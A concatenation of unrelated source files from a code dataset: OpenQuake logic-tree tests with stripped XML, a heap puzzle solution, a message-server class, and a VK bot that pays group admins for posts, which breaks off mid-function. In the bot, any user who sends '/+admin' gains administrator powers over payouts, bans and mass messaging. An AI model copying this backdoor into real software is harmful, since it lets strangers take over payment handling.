{'applyToSources': [s.source_id for s in sources]}\n ).filter_source(source),\n expected_result\n )\n\n test([self.simple_fault, self.area], self.point, False)\n test([self.simple_fault, self.area], self.area, True)\n test([self.complex_fault, self.simple_fault], self.area, False)\n test([self.area], self.area, True)\n test([self.point, self.simple_fault], self.simple_fault, True)\n test([self.point, self.complex_fault], self.simple_fault, False)\n\n\nclass GsimLogicTreeTestCase(unittest.TestCase):\n def parse_invalid(self, xml, errorclass, errormessage=None):\n if hasattr(xml, 'encode'):\n xml = xml.encode('utf8')\n with self.assertRaises(errorclass) as exc:\n logictree.GsimLogicTree(StringIO(xml), ['Shield'])\n if errormessage is not None:\n self.assertEqual(errormessage, str(exc.exception))\n\n def parse_valid(self, xml, tectonic_region_types=('Shield',)):\n xmlbytes = xml.encode('utf-8') if hasattr(xml, 'encode') else xml\n return logictree.GsimLogicTree(\n StringIO(xmlbytes), tectonic_region_types)\n\n def test_not_xml(self):\n self.parse_invalid('xxx', ET.ParseError)\n self.parse_invalid('\n \n \n \"\"\")\n self.parse_invalid(xml, AttributeError,\n \"No subnode named 'logicTree' found in 'nrml'\")\n\n def test_not_a_gsim_logic_tree(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n +100\n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, ValueError, 'Unknown GSIM: +100 in file ')\n\n def test_gmpe_uncertainty(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n +1\n 1.0\n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n ': only uncertainties of type \"gmpeModel\" are allowed '\n 'in gmpe logic tree')\n\n def test_two_branchsets_in_one_level(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SadighEtAl1997\n \n 1.0\n \n \n \n \n \n SadighEtAl1997\n \n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n ': Branching level bl1 has multiple branchsets')\n\n def test_branchset_id_not_unique(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n ChiouYoungs2008\n 0.7\n \n \n SadighEtAl1997\n 0.3\n \n \n \n \n \n \n ChiouYoungs2008\n 0.6\n \n \n SadighEtAl1997\n 0.4\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n \": Duplicated branchSetID bs1\")\n\n def test_invalid_gsim(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SAdighEtAl1997\n \n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, ValueError, \"Unknown GSIM: SAdighEtAl1997 in file \")\n\n def test_tectonic_region_type_used_twice(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SadighEtAl1997\n \n 1.0\n \n \n \n \n \n \n \n ChiouYoungs2008\n \n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n \": Found duplicated applyToTectonicRegionType=\"\n \"['Subduction Interface', 'Subduction Interface']\")\n\n def test_SHARE(self):\n # this is actually a reduced version of the full SHARE logic tree\n xml = codecs.open(\n os.path.join(DATADIR, 'gmpe_logic_tree_share_reduced.xml'),\n encoding='utf8').read().encode('utf8')\n as_model_trts = ['Active Shallow Crust', 'Stable Shallow Crust',\n 'Shield', 'Volcanic']\n fs_bg_model_trts = ['Active Shallow Crust', 'Stable Shallow Crust']\n as_model_lt = self.parse_valid(xml, as_model_trts)\n fs_bg_model_lt = self.parse_valid(xml, fs_bg_model_trts)\n self.assertEqual(as_model_lt.get_num_branches(),\n {'bs1': 4, 'bs2': 5, 'bs3': 2, 'bs4': 1})\n self.assertEqual(fs_bg_model_lt.get_num_branches(),\n {'bs1': 4, 'bs2': 5, 'bs3': 0, 'bs4': 0})\n self.assertEqual(as_model_lt.get_num_paths(), 40)\n self.assertEqual(fs_bg_model_lt.get_num_paths(), 20)\n self.assertEqual(len(list(as_model_lt)), 5 * 4 * 2 * 1)\n effective_rlzs = set(rlz.uid for rlz in fs_bg_model_lt)\n self.assertEqual(len(effective_rlzs), 5 * 4)\n\n def test_sampling(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SadighEtAl1997\n \n 0.4\n \n \n \n ToroEtAl2002\n \n 0.6\n \n \n \n \n \"\"\")\n # test a large number of samples with the algorithm used in the engine\n counter = collections.Counter()\n gsim_rlzs = list(self.parse_valid(xml, ['Volcanic']))\n for seed in range(1000):\n [rlz] = logictree.sample(gsim_rlzs, 1, seed)\n counter[rlz.lt_path] += 1\n # the percentages will be close to 40% and 60%\n self.assertEqual(counter, {('b1',): 413, ('b2',): 587})\n\n def test_get_gsim_by_trt(self):\n xml = _make_nrml(\"\"\"\\\n \n\n \n \n\n \n AkkarBommer2010\n 1.0\n \n \n \n \n\n \n \n\n \n AkkarBommer2010\n 1.0\n \n \n \n \n\n \n \n\n \n ToroEtAl2002SHARE\n 1.0\n \n \n \n \n\n \n \n \n \n ZhaoEtAl2006SInter\n 1.0\n \n \n \n \n\n \n \n\n \n ZhaoEtAl2006SSlab\n 1.0\n \n \n \n \n\n \n \n \n FaccioliEtAl2010\n 1.0\n \n \n \n\n \n \n\n \n LinLee2008SSlab\n 1.0\n \n\n \n \n\n \"\"\")\n gsim_lt = self.parse_valid(xml, [\"Stable Shallow Crust\"])\n [rlz] = gsim_lt\n gsim = gsim_lt.get_gsim_by_trt(rlz, 'Stable Shallow Crust')\n self.assertEqual(str(gsim), 'AkkarBommer2010()')\n # this test was broken in release 1.4, a wrong ordering\n # of the value gave back LinLee2008SSlab instead of AkkarBommer2010\n self.assertEqual([str(v) for v in rlz.value], [\n 'AkkarBommer2010()', 'AkkarBommer2010()', 'ToroEtAl2002SHARE()',\n 'ZhaoEtAl2006SInter()', 'ZhaoEtAl2006SSlab()',\n 'FaccioliEtAl2010()', 'LinLee2008SSlab()'])\n\n def test_gsim_with_kwargs(self):\n class FakeGMPETable(object):\n def __init__(self, gmpe_table):\n self.gmpe_table = gmpe_table\n\n def __str__(self):\n return 'FakeGMPETable(gmpe_table=\"%s\")' % self.gmpe_table\n\n valid.GSIM['FakeGMPETable'] = FakeGMPETable\n try:\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n FakeGMPETable\n \n 1.0\n \n \n \n \n \"\"\")\n gsim_lt = self.parse_valid(xml, ['Shield'])\n self.assertEqual(repr(gsim_lt), '''''')\n finally:\n del valid.GSIM['FakeGMPETable']\n\n\nclass LogicTreeProcessorTestCase(unittest.TestCase):\n def setUp(self):\n # this is an example with number_of_logic_tree_samples = 1\n oqparam = tests.get_oqparam('classical_job.ini')\n self.source_model_lt = readinput.get_source_model_lt(oqparam)\n self.gmpe_lt = readinput.get_gsim_lt(\n oqparam, ['Active Shallow Crust', 'Subduction Interface'])\n self.seed = oqparam.random_seed\n\n def test_sample_source_model(self):\n [(sm_name, weight, branch_ids, _, _)] = self.source_model_lt\n self.assertEqual(sm_name, 'example-source-model.xml')\n self.assertEqual(('b1', 'b4', 'b7'), branch_ids)\n\n def test_multi_sampling(self):\n orig_samples = self.source_model_lt.num_samples\n self.source_model_lt.num_samples = 10\n samples_dic = self.source_model_lt.samples_by_lt_path()\n try:\n self.assertEqual(samples_dic, collections.Counter(\n {('b1', 'b4', 'b7'): 6, ('b1', 'b5', 'b8'): 4}))\n finally:\n self.source_model_lt.num_samples = orig_samples\n\n def test_sample_gmpe(self):\n [(value, weight, branch_ids, _, _)] = logictree.sample(\n list(self.gmpe_lt), 1, self.seed)\n self.assertEqual(value, ('ChiouYoungs2008()', 'SadighEtAl1997()'))\n self.assertEqual(weight, 0.5)\n self.assertEqual(('b2', 'b3'), branch_ids)\n\n\nclass LogicTreeProcessorParsePathTestCase(unittest.TestCase):\n def setUp(self):\n oqparam = tests.get_oqparam('classical_job.ini')\n\n self.uncertainties_applied = []\n\n def apply_uncertainty(branchset, value, source):\n fingerprint = (branchset.uncertainty_type, value)\n self.uncertainties_applied.append(fingerprint)\n self.original_apply_uncertainty = logictree.BranchSet.apply_uncertainty\n logictree.BranchSet.apply_uncertainty = apply_uncertainty\n\n self.source_model_lt = readinput.get_source_model_lt(oqparam)\n self.gmpe_lt = readinput.get_gsim_lt(\n oqparam, ['Active Shallow Crust', 'Subduction Interface'])\n\n def tearDown(self):\n logictree.BranchSet.apply_uncertainty = self.original_apply_uncertainty\n\n def test_parse_source_model_logictree_path(self):\n make_apply_un = self.source_model_lt.make_apply_uncertainties\n make_apply_un(['b1', 'b5', 'b8'])(None)\n self.assertEqual(self.uncertainties_applied,\n [('maxMagGRRelative', -0.2),\n ('bGRRelative', -0.1)])\n del self.uncertainties_applied[:]\n make_apply_un(['b1', 'b3', 'b6'])(None)\n self.assertEqual(self.uncertainties_applied,\n [('maxMagGRRelative', 0.2),\n ('bGRRelative', 0.1)])\n\n def test_parse_invalid_smlt(self):\n smlt = os.path.join(DATADIR, 'source_model_logic_tree.xml')\n with self.assertRaises(Exception) as ctx:\n for smpath in source.collect_source_model_paths(smlt):\n pass\n exc = ctx.exception\n self.assertIn('not well-formed (invalid token)', str(exc))\n self.assertEqual(exc.lineno, 5)\n self.assertEqual(exc.offset, 61)\n self.assertEqual(exc.filename, smlt)\n","repo_name":"GFZ-Centre-for-Early-Warning/shakyground","sub_path":"openquake/commonlib/tests/logictree_test.py","file_name":"logictree_test.py","file_ext":"py","file_size_in_byte":112470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39817000046","text":"import sys\r\nimport heapq\r\ninput = sys.stdin.readline\r\ng = lambda: [*map(int, input().split())]\r\n\r\nN = int(input())\r\narr = g()\r\nheapq.heapify(arr)\r\nfor k in range(N - 1):\r\n for num in g():\r\n if arr[0] < num:\r\n heapq.heappop(arr)\r\n heapq.heappush(arr, num)\r\nprint(arr[0])","repo_name":"juwkim/boj","sub_path":"백준/Silver/2075. N번째 큰 수/N번째 큰 수.py","file_name":"N번째 큰 수.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73294516725","text":"from enum import Enum\nfrom src.Engine.helpers.NewThreadExecutionAanotation import executeInNewThread\n\n\nclass MsgTypes(Enum):\n NEW_RECORDING = 1,\n UPDATE_PCM_CHART = 2,\n NEW_CURRENT_CHUNK = 3,\n RECORDING_STOP = 4,\n RECORDING_PAUSE = 5,\n UPDATE_FREQ_SPECTR_CHART = 6,\n UPDATE_FREQS_CHART = 7,\n NEW_HZ = 8\n\n\nclass MessageServer:\n _observers: list = []\n _observersByEvents: dict = {\n MsgTypes.NEW_RECORDING: [],\n MsgTypes.UPDATE_PCM_CHART: [],\n MsgTypes.NEW_CURRENT_CHUNK: [],\n MsgTypes.RECORDING_STOP: [],\n MsgTypes.RECORDING_PAUSE: [],\n MsgTypes.UPDATE_FREQ_SPECTR_CHART: [],\n MsgTypes.UPDATE_FREQS_CHART: [],\n MsgTypes.NEW_HZ: []\n }\n \n @classmethod\n def register(self, obj):\n self._observers.append(obj)\n \n @classmethod\n def registerForEvent(cls, obj, eventType: MsgTypes):\n cls._observersByEvents.get(eventType).append(obj)\n \n @classmethod\n def unRegister(self, obj):\n self._observers.remove(obj)\n \n @classmethod\n def notifyClients(self, msgType: MsgTypes, data=None):\n for i in self._observers:\n i.handleMessage(msgType=msgType, data=data)\n \n @classmethod\n def notifyEventClients(self, msgType: MsgTypes, data=None):\n for i in self._observersByEvents.get(msgType):\n i.handleMessage(msgType=msgType, data=data)\n","repo_name":"maciejj04/Apollo","sub_path":"src/MessageServer.py","file_name":"MessageServer.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23407545441","text":"import json\nimport os\nimport requests\nfrom data import TOKEN, token, admin_id\nimport vk_api\nimport datetime as dt\n\napi_version = '5.52'\nvk_session = vk_api.VkApi(token=TOKEN)\nvk_session1 = vk_api.VkApi(token=token)\nvk = vk_session.get_api()\n\n\ndef get_but(text, color):\n return {\n \"action\": {\n \"type\": \"text\",\n \"payload\": \"{\\\"button\\\": \\\"\" + \"1\" + \"\\\"}\",\n \"label\": f\"{text}\"\n },\n \"color\": f\"{color}\"\n }\n\n\nmain_keyboard = {\n \"one_time\": False,\n \"buttons\": [\n [get_but('😍Получить посты', 'default'), get_but('🤑Получить оплату', 'default')],\n [get_but('📈Топ админов', 'default'), get_but('🤩Посчитать охват', 'default')]\n ]\n}\nmain_keyboard = json.dumps(main_keyboard, ensure_ascii=False).encode('utf-8')\nmain_keyboard = str(main_keyboard.decode('utf-8'))\n\npayment_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('◀Назад', 'default')]\n ]\n}\npayment_keyboard = json.dumps(payment_keyboard, ensure_ascii=False).encode('utf-8')\npayment_keyboard = str(payment_keyboard.decode('utf-8'))\n\npayment2_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('🤑Получить оплату', 'default')]\n ]\n}\npayment2_keyboard = json.dumps(payment2_keyboard, ensure_ascii=False).encode('utf-8')\npayment2_keyboard = str(payment2_keyboard.decode('utf-8'))\n\nyes_or_no_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('✅Да', 'positive'), get_but('◀Назад', 'default')]\n ]\n}\nyes_or_no_keyboard = json.dumps(yes_or_no_keyboard, ensure_ascii=False).encode('utf-8')\nyes_or_no_keyboard = str(yes_or_no_keyboard.decode('utf-8'))\n\nadmin_panel_keyboard = {\n \"one_time\": False,\n \"buttons\": [\n [get_but('💰Входящие оплаты', 'default'), get_but('😍Добавить оплач��нные посты', 'default')],\n [get_but('🤩Посчитать охват', 'default'), get_but('⛔Заблокировать паблик', 'default')],\n [get_but('✏Ручная рассылка', 'default'), get_but('🔗Добавить посты для закупов', 'default')],\n [get_but('📈Топ админов', 'default'), get_but('⚒Разблокировать паблик', 'default')]\n ]\n}\n\nadmin_panel_keyboard = json.dumps(admin_panel_keyboard, ensure_ascii=False).encode('utf-8')\nadmin_panel_keyboard = str(admin_panel_keyboard.decode('utf-8'))\n\nadmin_yes_or_no_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('✅Да', 'positive'), get_but('🚫Нет', 'negative')]\n ]\n}\nadmin_yes_or_no_keyboard = json.dumps(admin_yes_or_no_keyboard, ensure_ascii=False).encode('utf-8')\nadmin_yes_or_no_keyboard = str(admin_yes_or_no_keyboard.decode('utf-8'))\n\nadmin_yes_or_no_keyboard2 = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('✅Оплачено', 'positive'), get_but('⛔Заблокировать посты', 'negative')]\n ]\n}\nadmin_yes_or_no_keyboard2 = json.dumps(admin_yes_or_no_keyboard2, ensure_ascii=False).encode('utf-8')\nadmin_yes_or_no_keyboard2 = str(admin_yes_or_no_keyboard2.decode('utf-8'))\n\n\ndef sender(user_id, text, key):\n if key == 0:\n vk_session.method('messages.send', {'user_id': user_id, 'message': text, 'random_id': 0,\n 'keyboard': main_keyboard})\n if key == 1:\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': payment_keyboard})\n if key == 2:\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': yes_or_no_keyboard})\n if key == 3:\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': payment2_keyboard})\n if key == 'admin_rules':\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': admin_panel_keyboard})\n if key == 'admin_yes_or_no':\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': admin_yes_or_no_keyboard})\n if key == 'admin_yes':\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': admin_yes_or_no_keyboard2})\n if key == '666':\n vk_session.method('messages.send', {'user_id': user_id, 'message': text, 'random_id': 0})\n\n\ndef main():\n global vk_session, vk_session1, vk\n try:\n while True:\n messages = vk_session.method('messages.getConversations', {'count': 200, 'filter': 'unanswered'})\n # time.sleep(1)\n if messages['count'] != 0:\n with open('dialog_state.json') as dial:\n dialogs = json.load(dial)\n user_id = str(messages['items'][0]['last_message']['from_id'])\n msg = messages['items'][0]['last_message']['text']\n if user_id not in dialogs:\n dialogs[user_id] = 'main'\n sender(user_id, 'Приветствую тебя', 0)\n with open('dialog_state.json', 'w') as file:\n json.dump(dialogs, file)\n elif user_id in admin_id or dialogs[user_id] == 'admin_rules':\n admin_dialog(user_id, msg)\n else:\n user_dialog(user_id, msg)\n except vk_api.exceptions.ApiError:\n vk_session = vk_api.VkApi(token=TOKEN)\n vk_session1 = vk_api.VkApi(token=token)\n vk = vk_session.get_api()\n main()\n except requests.exceptions.ConnectionError:\n vk_session = vk_api.VkApi(token=TOKEN)\n vk_session1 = vk_api.VkApi(token=token)\n vk = vk_session.get_api()\n main()\n\n\ndef admin_dialog(user_id, msg):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if 'Посчитать охват' in msg:\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n dialogs[user_id] = 'checker'\n elif 'wall' in msg and dialogs[user_id] == 'checker':\n pay = get_views(msg, False, user_id)\n sender(user_id, pay[0], 1)\n elif 'Назад' in msg:\n dialogs[user_id] = 'admin_rules'\n sender(user_id, '😍🤑', 'admin_rules')\n elif 'Добавить оплаченные посты' in msg:\n dialogs[user_id] = 'pay_post'\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n elif dialogs[user_id] == 'pay_post' and 'wall' in msg:\n posts = msg.split('\\n')\n for elem in posts:\n done = append_doned(elem, admin_id, 'payed')\n sender(user_id, 'Успешно', 'admin_rules')\n elif '✅Да' in msg:\n send_payment()\n elif '💰Входящие оплаты' in msg:\n send_payment()\n elif '✅Оплачено' in msg:\n sender(admin_id, 'Введите номер оплаты:', '666')\n dialogs[user_id] = 'number_of_pay'\n elif dialogs[user_id] == 'number_of_pay':\n checker, done, top, text = send_grate_payment(msg)\n sender(user_id, text, '666')\n dialogs[user_id] = 'admin_rules'\n send_payment()\n elif 'Заблокировать паблик' in msg:\n sender(user_id, 'Укажите ссылку на пост или группу', 1)\n dialogs[user_id] = 'block_group'\n elif dialogs[user_id] == 'block_group':\n url = msg.split('\\n')\n for msg in url:\n if 'wall' in msg:\n group = msg.split('wall')[1].split('_')[0]\n elif 'group' in msg:\n group = '-' + msg.split('public')[1]\n else:\n info = vk_session1.method('groups.getById', {'group_id': msg.split('com/')[1]})\n group = '-' + str(info[0]['id'])\n if group not in ban['groups']:\n ban['groups'].append(group)\n sender(user_id, f'Группа {msg} забанена', 'admin_rules')\n else:\n sender(user_id, f'Группа {msg} уже в бане', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n elif 'Добавить посты для закупов' in msg:\n sender(user_id, 'Пришлите фото', 1)\n dialogs[user_id] = 'add_post_photo'\n elif dialogs[user_id] == 'add_post_photo':\n save_photo()\n dialogs[user_id] = 'add_post_copyright'\n elif dialogs[user_id] == 'add_post_copyright':\n name = os.listdir(path=\"data\")[-1]\n descript[name] = [msg]\n dialogs[user_id] = 'add_post_date'\n sender(user_id, 'Успешно, пришлите дату в формате ДД.ММ.ГГГГ', '666')\n elif dialogs[user_id] == 'add_post_date':\n name = os.listdir(path=\"data\")[-1]\n descript[name].append(msg)\n sender(user_id, 'Успешно', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n elif 'Ручная рассылка' in msg:\n sender(user_id, 'Введите сообщение:', 1)\n dialogs[user_id] = 'spam'\n elif dialogs[user_id] == 'spam':\n names = list(dialogs.keys())\n for name in names:\n if name != admin_id:\n sender(name, msg, 0)\n else:\n sender(name, 'Успешно', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n elif msg == '📈Топ админов':\n admins = list(top['all'].keys())\n admins.sort(key=lambda x: -int(top['all'][x][0]))\n text = f'Админы заработали с нами: {top[\"sum\"]}₽\\n'\n k = len(admins)\n if len(admins) >= 10:\n k = 11\n for i in range(k):\n text += f'\\n{i + 1}) {admins[i]} - {top[\"all\"][admins[i]][0]}₽, ' \\\n f'опубликовано {top[\"all\"][admins[i]][1]} постов'\n sender(user_id, text, 'admin_rules')\n elif 'Разблокировать паблик' in msg:\n dialogs[user_id] = 'unban'\n sender(user_id, 'Укажите ссылку на пост или группу', 1)\n elif dialogs[user_id] == 'unban':\n url = msg.split('\\n')\n for msg in url:\n if 'wall' in msg:\n group = msg.split('wall')[1].split('_')[0]\n elif 'group' in msg:\n group = '-' + msg.split('public')[1]\n else:\n info = vk_session1.method('groups.getById', {'group_id': msg.split('com/')[1]})\n group = '-' + str(info[0]['id'])\n if group in ban['groups']:\n id = ban['groups'].index(group)\n del ban['groups'][id]\n sender(user_id, f'Группа {msg} разбанена', 'admin_rules')\n else:\n sender(user_id, f'Группа {msg} не в бане', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n else:\n dialogs[user_id] = 'admin_rules'\n sender(user_id, '😍🤑', 'admin_rules')\n save_json(dialogs, checker, done, req, top, descript, ban)\n\n\ndef user_dialog(user_id, msg):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if msg == '/+admin':\n dialogs[user_id] = 'admin_rules'\n sender(user_id, 'Вы получили права администратора', 'admin_rules')\n elif 'Получить оплату' in msg:\n if dialogs[user_id] == 'payment1':\n dialogs[user_id] = 'payment2'\n sender(user_id, 'Укажите номер киви в формате +79000000000', 1)\n else:\n dialogs[user_id] = 'payment1'\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n elif 'Получить посты' in msg:\n names = os.listdir(path=\"data\")\n if len(names) == 0:\n sender(user_id, 'Закупов на данный момент нет', 0)\n else:\n for name in names:\n if 'unactive' not in descript[name]:\n date = descript[name][1]\n copy = descript[name][0]\n print(str(dt.date.today())[-5:-2], date[-5:-2])\n if int(str(dt.date.today())[-2:]) - int(date[-2:]) >= 0 and str(dt.date.today())[-5:-2] == date[-5:-2]:\n descript[name].append('unactive')\n continue\n upload = vk_api.VkUpload(vk_session)\n photo = upload.photo_messages(f'data\\{name}', user_id)\n owner_id = photo[0]['owner_id']\n photo_id = photo[0]['id']\n access_key = photo[0]['access_key']\n attachment = f'photo{owner_id}_{photo_id}_{access_key}'\n sender(user_id, f'На {date} \\n'\n f'Исток: {copy}', 0)\n vk.messages.send(peer_id=user_id, random_id=0, attachment=attachment)\n elif 'Посчитать охват' in msg:\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n dialogs[user_id] = 'checker'\n elif 'wall' in msg and dialogs[user_id] == 'checker':\n pay = get_views(msg, False, user_id)\n sender(user_id, pay[0], 1)\n elif dialogs[user_id] == 'payment1' and 'wall' in msg:\n pay = get_views(msg, True, user_id)\n req[user_id] = [pay[1], msg.split('\\n')]\n sender(user_id, pay[0], 3)\n if pay[-1]:\n sender(user_id, '\\n'.join(pay[-1]), 3)\n if pay[1] == 0:\n dialogs[user_id] = 'main'\n sender(user_id, '😍🤑', 0)\n elif '+79' in msg and dialogs[user_id] == 'payment2':\n dialogs[user_id] = 'payment3'\n sender(user_id, f'Оплачиваем {req[user_id][0]}₽ на киви {msg} \\nВсе верно?', 2)\n req[user_id].append(msg)\n elif 'Назад' in msg:\n dialogs[user_id] = 'main'\n sender(user_id, '😍🤑', 0)\n elif msg == '✅Да' and dialogs[user_id] == 'payment3':\n sender(user_id, '✅Оплата успешно запрошена! \\n‼НЕ удаляйте посты до получения оплаты!', 0)\n last = int(checker['last'])\n checker['last'] = last + 1\n checker[last] = req[user_id]\n checker[last].append(f'vk.com/id{user_id}')\n dialogs[user_id] = 'main'\n for elem in req[user_id][1]:\n done = append_doned(elem, user_id, 'requested')\n send_noutification()\n elif msg == '📈Топ админов':\n admins = list(top['all'].keys())\n admins.sort(key=lambda x: -int(top['all'][x][0]))\n text = f'Админы заработали с нами: {top[\"sum\"]}₽\\n'\n k = len(admins)\n if len(admins) >= 10:\n k = 11\n for i in range(k):\n text += f'\\n{i + 1}) https://{admins[i]} - {top[\"all\"][admins[i]][0]}₽, ' \\\n f'опубликовано {top[\"all\"][admins[i]][1]} постов'\n sender(user_id, text, 0)\n else:\n sender(user_id, '😍🤑', 0)\n dialogs[user_id] = 'main'\n save_json(dialogs, checker, done, req, top, descript, ban)\n\n\ndef send_noutification():\n post = 1\n dialogs, checker, done, req, top, descript, ban = open_json()\n last = checker['last']\n for i in range(last + 1, 100000000, -1):\n if str(i) in checker:\n post += 1\n sender(admin_id, f'{post} постов ожидают оплаты. \\nПросмотреть?', 'admin_yes_or_no')\n\n\ndef send_payment():\n dialogs, checker, done, req, top, descript, ban = open_json()\n payment_id = checker['last'] - 1\n while str(payment_id) not in checker:\n payment_id -= 1\n if payment_id < 100000000:\n sender(admin_id, 'Входящих оплат нет', 'admin_rules')\n return True\n sender(admin_id, 'ОПЛАТА 💰', '666')\n sender(admin_id, f'{str(payment_id)}', '666')\n sender(admin_id, f'🧛‍♂админ: {checker[str(payment_id)][3]}\\n' +\n '😍 посты:' + str('\\n'.join(checker[str(payment_id)][1])) +\n f'\\n💵сумма: {checker[str(payment_id)][0]}\\n'\n f'Qiwi: {checker[str(payment_id)][2]}', 'admin_yes')\n\n\ndef send_grate_payment(payment_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if payment_id in checker:\n sender(checker[payment_id][3][9:],\n f'✅Вы получили оплату за посты. '\n f'\\nНомер киви: {checker[payment_id][2]} '\n f'\\nСумма: {checker[payment_id][0]}₽'\n f'\\nСтатус: Оплачено✅ '\n f'\\nОставьте отзыв, чтобы другие админы не просили предоплату: '\n f'\\nhttps://vk.com/topic-203281870_47417826',\n 0)\n top['sum'] += checker[payment_id][0]\n if checker[payment_id][3] not in top['all']:\n top['all'][checker[payment_id][3]] = [0, 0]\n top['all'][checker[payment_id][3]][0] += checker[payment_id][0]\n for url in checker[payment_id][1]:\n user_id = url.split('wall')[1]\n group_id = user_id.split('_')[0]\n post_id = user_id.split('_')[1]\n top['all'][checker[payment_id][3]][1] += 1\n done[group_id][post_id][1] = 'payed'\n del checker[payment_id]\n text = 'Успешно оплачено'\n else:\n text = 'Входящих оплат нет'\n return checker, done, top, text\n\n\ndef block_payment(payment_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n sender(checker[payment_id][3][7:], f'😳Ваша оплата №{payment_id} была отклонена. '\n f'За подробностями к vk.com/id{admin_id}', 0)\n for url in checker[payment_id][1]:\n user_id = url.split('wall')[1]\n group_id = user_id.split('_')[0]\n post_id = user_id.split('_')[1]\n done[group_id][post_id][1] = 'banned'\n del checker[payment_id]\n return done, checker\n\n\ndef open_json():\n with open('dialog_state.json') as dial:\n dialogs = json.load(dial)\n with open('checker.json') as dial:\n checker = json.load(dial)\n with open('doned.json') as dial:\n done = json.load(dial)\n with open('requests.json') as dial:\n req = json.load(dial)\n with open('top_of_all.json') as dial:\n top = json.load(dial)\n with open('post_description.json') as dial:\n descript = json.load(dial)\n with open('banned.json') as dial:\n ban = json.load(dial)\n return dialogs, checker, done, req, top, descript, ban\n\n\ndef save_json(dialogs, checker, done, req, top, descript, ban):\n with open('dialog_state.json', 'w') as file:\n json.dump(dialogs, file)\n with open('checker.json', 'w') as file:\n json.dump(checker, file)\n with open('doned.json', 'w') as file:\n json.dump(done, file)\n with open('requests.json', 'w') as file:\n json.dump(req, file)\n with open('top_of_all.json', 'w') as file:\n json.dump(top, file)\n with open('post_description.json', 'w') as file:\n json.dump(descript, file)\n with open('banned.json', 'w') as file:\n json.dump(ban, file)\n\n\ndef check_copypaste(copy):\n dialogs, checker, done, req, top, descript, ban = open_json()\n names = os.listdir(path=\"data\")\n for name in names:\n if copy == descript[name][0]:\n return True\n return False\n\n\ndef check_contacts(group_id, user_id):\n info = vk_session1.method('groups.getById', {'group_id': group_id[1:], 'fields': 'contacts'})\n state = False\n for i in range(len(info[0]['contacts'])):\n if int(info[0]['contacts'][i]['user_id']) == int(user_id):\n state = True\n break\n return state\n\n\ndef check_doned(user_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n group_id = user_id.split('_')[0]\n post_id = user_id.split('_')[1]\n if group_id in done:\n if post_id in done[group_id]:\n return done[group_id][post_id][1]\n return False\n\n\ndef append_doned(url, user_id, text):\n dialogs, checker, done, req, top, descript, ban = open_json()\n try:\n group_id = url.split('wall')[1].split('_')[0]\n post_id = url.split('wall')[1].split('_')[1]\n info = vk_session1.method('wall.getById', {'posts': f\"{group_id}_{post_id}\"})\n unix = info[0]['date']\n date = unix // 86400\n if group_id not in done:\n done[group_id] = {}\n done[group_id][post_id] = [date, text]\n return done\n except:\n if user_id == admin_id:\n sender(user_id, 'Ошибка', 'admin_rules')\n else:\n sender(user_id, 'Ошибка', 0)\n return done\n\n\ndef data_check(post_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n group_id = post_id.split('_')[0]\n post_id = post_id.split('_')[1]\n info = vk_session1.method('wall.getById', {'posts': f\"{group_id}_{post_id}\"})\n unix = info[0]['date']\n date = unix // 86400\n today = dt.datetime.timestamp(dt.datetime.today()) // 86400\n if today - date >= 5:\n return 'long'\n else:\n files = os.listdir(path=\"data\")\n count_files_data = len(files)\n for i in range(count_files_data):\n name = f'img{i}.jpg'\n if name in descript:\n if descript[name][1] == date:\n return True\n return 'uncorrect'\n\n\ndef banned_public(group_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if group_id in ban['groups']:\n return False\n return True\n\n\ndef get_views(urls, state, user_id):\n urls = urls.split('\\n')\n counted_urls = []\n deffect_postes = []\n 